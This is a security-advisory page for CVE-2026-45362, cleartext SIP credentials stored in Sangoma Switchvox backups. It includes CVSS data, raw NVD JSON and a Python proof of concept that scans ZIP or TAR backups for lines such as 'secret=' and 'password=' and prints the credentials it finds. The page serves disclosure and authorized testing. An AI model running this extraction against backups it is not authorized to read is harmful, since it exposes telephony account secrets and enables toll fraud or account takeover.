Security Vulnerability Report
CVE-2026-45362 CVSS 3.2 LOW

CVE-2026-45362

Published: 2026-05-12 01:16:47
Last Modified: 2026-05-12 01:16:47

Description

Sangoma Switchvox before 8.4 places cleartext SIP authentication credentials in a backup file.

CVSS Details

CVSS Score
3.2
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Sangoma Switchvox < 8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
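#!/usr/bin/env python3
"""
PoC for CVE-2026-45362: Sangoma Switchvox Cleartext SIP Credentials in Backup

This script demonstrates how to extract cleartext credentials from a
vulnerable backup file.

Archive members are only read through in-memory file objects and are never
unpacked to disk, so member names taken from the archive are used purely as
labels. Matching lines are printed verbatim: the output carries whatever
secrets the backup holds and should be handled like the backup itself.
"""
import io
import os
import sys
import tarfile
import zipfile

# Common patterns indicating SIP credentials. These are plain substring
# matches: every 'md5secret=' line also matches 'secret=', and 'SIP ' is
# broad, so each hit is a candidate to review, not a confirmed credential.
_KEYWORDS = ('secret=', 'password=', 'md5secret=', 'SIP ')


def _scan_member(label, raw, found):
    """Append every keyword-bearing line of one archive member to *found*.

    ``label`` is the member name used as the prefix of each reported entry.
    ``raw`` is the member's binary file object; it is closed on return,
    including when reading fails part-way.
    """
    # Decode incrementally rather than loading the whole member at once.
    with io.TextIOWrapper(raw, encoding='utf-8', errors='ignore') as text:
        for chunk in text:
            # splitlines() keeps the same line boundaries as decoding the
            # full member and splitting it in one go.
            for line in chunk.splitlines():
                if any(keyword in line for keyword in _KEYWORDS):
                    found.append(f"{label}: {line.strip()}")


def _scan_zip(backup_path, found):
    """Scan every entry of a ZIP backup, skipping entries that cannot be read."""
    with zipfile.ZipFile(backup_path, 'r') as z:
        for filename in z.namelist():
            try:
                _scan_member(filename, z.open(filename), found)
            except Exception as e:
                # Best effort: an encrypted or damaged entry must not discard
                # the findings from the readable ones.
                print(f"[!] Skipping unreadable member {filename}: {e}")


def _scan_tar(backup_path, found):
    """Scan every regular file of a TAR backup, skipping unreadable members."""
    with tarfile.open(backup_path, 'r:*') as t:
        for member in t.getmembers():
            if not member.isfile():
                continue
            try:
                raw = t.extractfile(member)
                if raw is not None:
                    _scan_member(member.name, raw, found)
            except Exception as e:
                print(f"[!] Skipping unreadable member {member.name}: {e}")


def extract_creds_from_backup(backup_path):
    """
    Analyzes the backup file to find cleartext SIP credentials.

    Args:
        backup_path: Path to a ZIP or TAR (optionally compressed) backup.

    Returns:
        None. Progress, per-member skip notices and every matching line
        (prefixed with the archive member name) are printed to stdout.
    """
    print(f"[*] Analyzing backup file: {backup_path}")

    found_creds = []

    try:
        if zipfile.is_zipfile(backup_path):
            print("[+] Detected ZIP format backup.")
            _scan_zip(backup_path, found_creds)
        elif tarfile.is_tarfile(backup_path):
            print("[+] Detected TAR format backup.")
            _scan_tar(backup_path, found_creds)
        else:
            print("[-] Unknown backup format or file is corrupted.")
            return
    except Exception as e:
        # Archive-level failure (as opposed to a single bad member).
        print(f"[!] Error processing file: {e}")
        if not found_creds:
            return

    if found_creds:
        print(f"[!] Found {len(found_creds)} potential credential entries:")
        for entry in found_creds:
            print(entry)
    else:
        print("[*] No cleartext credentials found or backup is encrypted.")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 poc.py <path_to_switchvox_backup>")
        sys.exit(1)

    backup_file = sys.argv[1]
    if not os.path.exists(backup_file):
        print(f"[!] File not found: {backup_file}")
        sys.exit(1)

    extract_creds_from_backup(backup_file)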

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45362", "sourceIdentifier": "[email protected]", "published": "2026-05-12T01:16:47.017", "lastModified": "2026-05-12T01:16:47.017", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sangoma Switchvox before 8.4 places cleartext SIP authentication credentials in a backup file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 3.2, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.4, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-312"}]}], "references": [{"url": "https://github.com/sangoma/security-switchvox/security/advisories/GHSA-mfm3-g35x-c9w8", "source": "[email protected]"}, {"url": "https://github.com/wb6vpm/switchvox-svb-plaintext-sip-credentials/", "source": "[email protected]"}]}}